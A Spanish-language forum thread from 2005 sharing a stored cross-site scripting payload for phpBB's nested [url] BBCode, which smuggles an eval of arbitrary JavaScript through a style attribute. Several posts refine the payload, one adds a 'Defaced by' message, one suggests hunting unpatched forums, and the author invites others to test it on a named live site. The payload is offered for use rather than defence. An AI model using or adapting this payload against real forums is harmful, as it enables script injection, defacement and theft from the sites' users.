elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 06:59  


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Bug en BBCode en phpBB (SMF no).		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Bug en BBCode en phpBB (SMF no).  (Leído 1,330 veces)
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Bug en BBCode en phpBB (SMF no).
« en: 19 Septiembre 2005, 14:41 »
Hola, se me hizo raro que no estuviera este aca..

Código:
[url]www.[url=www.s=''style='top:epresionje(eval(this.sss));'sss=`CODIGO JS;this.sss=null`s='][/url][/url]'

Prueba de que si funciona:
http://dftraffic.com/foro/viewtopic.php?p=10#10
« Última modificación: 19 Septiembre 2005, 14:43 por Sirdarckcat » En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Bug en BBCode en phpBB (SMF no).
« Respuesta #1 en: 19 Septiembre 2005, 14:43 »
Yo no me pondría un foro de phpbb en mi web ni aunque me pagasen....
No hay cosa mas insegura que phpbb.
Saludos  ;)
En línea
rodimus

Desconectado Desconectado

Mensajes: 42



Ver Perfil
Re: Bug en BBCode en phpBB (SMF no).
« Respuesta #2 en: 20 Septiembre 2005, 22:44 »
Hasta k version es vulnerable el phpbb ???

Código:
[url]www.[url=www.s=''style='top:epresionje(eval(this.sss));'sss=`<script>alert('aki msg ')</script>;this.sss=null`s='][/url][/url]'

Esta bien asi el codigo ????
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Bug en BBCode en phpBB (SMF no).
« Respuesta #3 en: 20 Septiembre 2005, 23:07 »
sin el <script>, solo pon alert

se descubrio como por febrero o marzo de este año.. no se que version sea vulnerable.
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
rodimus

Desconectado Desconectado

Mensajes: 42



Ver Perfil
Re: Bug en BBCode en phpBB (SMF no).
« Respuesta #4 en: 20 Septiembre 2005, 23:22 »
Ok asi ?
Código:
[url]www.[url=www.s=''style='top:epresionje(eval(this.sss));'sss=`alert('aki msg');this.sss=null`s='][/url][/url]'
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Bug en BBCode en phpBB (SMF no).
« Respuesta #5 en: 21 Septiembre 2005, 01:50 »
¿porque no lo pruebas?

si esta bien.
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Bug en BBCode en phpBB (SMF no).
« Respuesta #6 en: 21 Septiembre 2005, 12:57 »
Tiene ya su tiempo el fallo y los foros más prestigiosos están parcheados contra éste.
En línea
joanikus

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Bug en BBCode en phpBB (SMF no).
« Respuesta #7 en: 23 Septiembre 2005, 16:39 »
okey gracias pero el aki msg puede ser asi?

]www.[url=www.s=''style='top:epresionje(eval(this.sss));'sss=`alert('Defaced by joanikus');this.sss=null`s='][/url]'
En línea
-sagitari-


Desconectado Desconectado

Mensajes: 1.640


:D


Ver Perfil WWW
Re: Bug en BBCode en phpBB (SMF no).
« Respuesta #8 en: 23 Septiembre 2005, 18:25 »
a mi o m funciona tampoco

debe d estar parchado n la mayoria
En línea
SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: Bug en BBCode en phpBB (SMF no).
« Respuesta #9 en: 23 Septiembre 2005, 21:18 »
No se dediquen a hackear foros men.... pero bueno, si fue descubierto hace tiempo es obvio que hay que buscar foros que no esten completamente actualizados, o averigua que version del foro es la que esta hackeada como "demostracion".
En línea
Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Bug en BBCode en phpBB (SMF no).
« Respuesta #10 en: 24 Septiembre 2005, 00:11 »
Bueno de hecho yo instale el foro en sus tiempos..
lo instale el año pasado, como por esta epoca ya son suficientes pistas no?
y la verdad si es demostracion jaja.. porque en ese foro no hay info importante, asi que pueden seguir experimentantdo en el.. y si quieren hacer otra intro de flash, porque la que esta ahorita, esta medio pirata, pero ps la hice en 15 minutos que querian?

ah y les anexo alguna broma para que le hagan a sus amigos.
una modificacion de WSD
http://dftraffic.com/clubpaco.htm
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
BBcode to HTMl me faltan cosas...
Desarrollo Web 		VanX 2 1,051 Último mensaje 13 Julio 2011, 20:55
por VanX
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines